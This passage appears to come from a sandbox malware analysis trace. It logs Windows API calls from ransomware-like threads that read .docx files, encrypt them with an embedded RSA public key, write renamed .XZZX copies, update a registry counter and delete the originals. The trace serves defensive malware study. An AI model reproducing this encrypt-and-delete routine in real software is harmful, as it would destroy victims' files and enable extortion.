lpOverlapped=0x0 | out: lpBuffer=0x3e2ff90*, lpNumberOfBytesWritten=0x417e438*=0x103a1, lpOverlapped=0x0) returned 1 [0037.707] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x103a1 [0037.707] WriteFile (in: hFile=0x458, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0037.707] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x103a6 [0037.707] WriteFile (in: hFile=0x458, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x16, lpOverlapped=0x0) returned 1 [0037.707] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x103bc [0037.708] WriteFile (in: hFile=0x458, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0037.708] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x103c1 [0037.708] SetErrorMode (uMode=0x1) returned 0x1 [0037.708] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0037.708] OutputDebugStringW (lpOutputString="end") [0037.708] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w¸Dä\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0037.708] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0037.708] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2cdc8) returned 1 [0037.709] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2cdc8, dwCertEncodingType=0x1, pInfo=0x3dd2408*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2438*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2440*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x324f78) returned 1 [0037.709] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.710] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0037.710] CryptEncrypt (in: hKey=0x324f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0037.710] CryptEncrypt (in: hKey=0x324f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2ce50*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2ce50*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0037.710] WriteFile (in: hFile=0x458, lpBuffer=0x3e2ce50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2ce50*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0037.710] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0037.710] WriteFile (in: hFile=0x458, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0037.710] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0037.710] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0037.710] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x46c) returned 0x0 [0037.710] RegQueryValueExW (in: hKey=0x46c, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x17, lpcbData=0x417dfdc*=0x4) returned 0x0 [0037.711] RegCloseKey (hKey=0x46c) returned 0x0 [0037.711] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x46c) returned 0x0 [0037.711] RegSetValueExW (in: hKey=0x46c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x18, cbData=0x4 | out: lpData=0x417dfec*=0x18) returned 0x0 [0037.711] RegCloseKey (hKey=0x46c) returned 0x0 [0037.711] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.711] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.712] CloseHandle (hObject=0x458) returned 1 [0037.713] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0037.713] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0037.714] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dsL8WL.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dsl8wl.docx")) returned 1 [0037.716] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dsL8WL.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dsl8wl.docx")) returned 0 Thread: id = 114 os_tid = 0x7b0 [0037.420] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.421] lstrcpyW (in: lpString1=0x42cf460, lpString2="e5mivlGcxa-nNKp.docx" | out: lpString1="e5mivlGcxa-nNKp.docx") returned="e5mivlGcxa-nNKp.docx" [0037.421] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.421] SetErrorMode (uMode=0x1) returned 0x1 [0037.421] lstrcpyW (in: lpString1=0x42cf860, lpString2="e5mivlGcxa-nNKp.docx" | out: lpString1="e5mivlGcxa-nNKp.docx") returned="e5mivlGcxa-nNKp.docx" [0037.421] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x640f901f, Data2=0xa8fe, Data3=0x4c43, Data4=([0]=0x98, [1]=0x74, [2]=0xa6, [3]=0x97, [4]=0xc7, [5]=0x19, [6]=0x1f, [7]=0xdb))) returned 0x0 [0037.421] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e5mivlGcxa-nNKp.docx") returned 64 [0037.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0037.421] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7E0556C23257A27A640F901F368486C2.XZZX") returned 81 [0037.421] StrStrW (lpFirst="e5mivlGcxa-nNKp.docx", lpSrch="XZZX") returned 0x0 [0037.421] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e5mivlGcxa-nNKp.docx", dwFileAttributes=0x20) returned 1 [0037.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e5mivlGcxa-nNKp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e5mivlgcxa-nnkp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0037.421] ReadFile (in: hFile=0x45c, lpBuffer=0x3e1aed8, nNumberOfBytesToRead=0xa0b9, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesRead=0x42ce418*=0xa0b9, lpOverlapped=0x0) returned 1 [0037.422] CloseHandle (hObject=0x45c) returned 1 [0037.422] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0037.422] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0037.423] SetErrorMode (uMode=0x1) returned 0x1 [0037.423] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0037.423] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ebec0) returned 1 [0037.425] CryptGenKey (in: hProv=0x3ebec0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324ff8) returned 1 [0037.613] CryptExportKey (in: hKey=0x324ff8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0037.613] CryptExportKey (in: hKey=0x324ff8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0037.613] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.614] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0037.614] CryptDestroyKey (hKey=0x324ff8) returned 1 [0037.614] CryptReleaseContext (hProv=0x3ebec0, dwFlags=0x0) returned 1 [0037.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7E0556C23257A27A640F901F368486C2.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7e0556c23257a27a640f901f368486c2.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0037.614] WriteFile (in: hFile=0x468, lpBuffer=0x3e1aed8*, nNumberOfBytesToWrite=0xa0b9, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesWritten=0x42ce438*=0xa0b9, lpOverlapped=0x0) returned 1 [0037.615] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa0b9 [0037.616] WriteFile (in: hFile=0x468, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.616] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa0be [0037.616] WriteFile (in: hFile=0x468, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x28, lpOverlapped=0x0) returned 1 [0037.616] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa0e6 [0037.616] WriteFile (in: hFile=0x468, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.616] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa0eb [0037.616] SetErrorMode (uMode=0x1) returned 0x1 [0037.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0037.616] OutputDebugStringW (lpOutputString="end") [0037.616] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0037.616] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0037.616] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3ebec0) returned 1 [0037.617] CryptImportPublicKeyInfo (in: hCryptProv=0x3ebec0, dwCertEncodingType=0x1, pInfo=0x3dd2338*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2368*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2370*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3250b8) returned 1 [0037.617] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.618] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0037.618] CryptEncrypt (in: hKey=0x3250b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0037.618] CryptEncrypt (in: hKey=0x3250b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ebf48*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ebf48*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0037.618] WriteFile (in: hFile=0x468, lpBuffer=0x3ebf48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3ebf48*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0037.618] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0037.618] WriteFile (in: hFile=0x468, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.618] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0037.618] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0037.618] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x46c) returned 0x0 [0037.618] RegQueryValueExW (in: hKey=0x46c, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x16, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0037.618] RegCloseKey (hKey=0x46c) returned 0x0 [0037.618] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x46c) returned 0x0 [0037.619] RegSetValueExW (in: hKey=0x46c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x17, cbData=0x4 | out: lpData=0x42cdfec*=0x17) returned 0x0 [0037.619] RegCloseKey (hKey=0x46c) returned 0x0 [0037.619] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.619] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0037.619] CloseHandle (hObject=0x468) returned 1 [0037.620] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0037.621] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0037.621] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e5mivlGcxa-nNKp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e5mivlgcxa-nnkp.docx")) returned 1 [0037.622] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e5mivlGcxa-nNKp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e5mivlgcxa-nnkp.docx")) returned 0 Thread: id = 115 os_tid = 0x794 [0037.661] lstrcpyA (in: lpString1=0x43cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.661] lstrcpyW (in: lpString1=0x43cf460, lpString2="eL7YHoCZexIT pMk.docx" | out: lpString1="eL7YHoCZexIT pMk.docx") returned="eL7YHoCZexIT pMk.docx" [0037.661] lstrcpyW (in: lpString1=0x43ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.661] SetErrorMode (uMode=0x1) returned 0x1 [0037.661] lstrcpyW (in: lpString1=0x43cf860, lpString2="eL7YHoCZexIT pMk.docx" | out: lpString1="eL7YHoCZexIT pMk.docx") returned="eL7YHoCZexIT pMk.docx" [0037.661] CoCreateGuid (in: pguid=0x43ce440 | out: pguid=0x43ce440*(Data1=0xff50021b, Data2=0x84c6, Data3=0x41cc, Data4=([0]=0x89, [1]=0xfb, [2]=0x11, [3]=0xe3, [4]=0x9d, [5]=0xf7, [6]=0x91, [7]=0x91))) returned 0x0 [0037.661] wsprintfW (in: param_1=0x43cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eL7YHoCZexIT pMk.docx") returned 65 [0037.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x43cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0037.661] wsprintfW (in: param_1=0x43ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B8F78CE2222013C8FF50021B265CF810.XZZX") returned 81 [0037.661] StrStrW (lpFirst="eL7YHoCZexIT pMk.docx", lpSrch="XZZX") returned 0x0 [0037.661] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eL7YHoCZexIT pMk.docx", dwFileAttributes=0x20) returned 1 [0037.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eL7YHoCZexIT pMk.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\el7yhoczexit pmk.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0037.662] ReadFile (in: hFile=0x458, lpBuffer=0x3e2ed28, nNumberOfBytesToRead=0x6f7, lpNumberOfBytesRead=0x43ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e2ed28*, lpNumberOfBytesRead=0x43ce418*=0x6f7, lpOverlapped=0x0) returned 1 [0037.662] CloseHandle (hObject=0x458) returned 1 [0037.662] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0037.663] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0037.663] SetErrorMode (uMode=0x1) returned 0x1 [0037.663] lstrcpyW (in: lpString1=0x43ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0037.663] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2cd40) returned 1 [0037.666] CryptGenKey (in: hProv=0x3e2cd40, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x325078) returned 1 [0037.979] CryptExportKey (in: hKey=0x325078, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x43ce41c | out: pbData=0x0*, pdwDataLen=0x43ce41c*=0x94) returned 1 [0037.979] CryptExportKey (in: hKey=0x325078, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x43ce41c | out: pbData=0x3e60000*, pdwDataLen=0x43ce41c*=0x94) returned 1 [0037.979] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.980] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0037.980] CryptDestroyKey (hKey=0x325078) returned 1 [0037.980] CryptReleaseContext (hProv=0x3e2ced8, dwFlags=0x0) returned 0 [0037.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B8F78CE2222013C8FF50021B265CF810.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b8f78ce2222013c8ff50021b265cf810.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0037.980] WriteFile 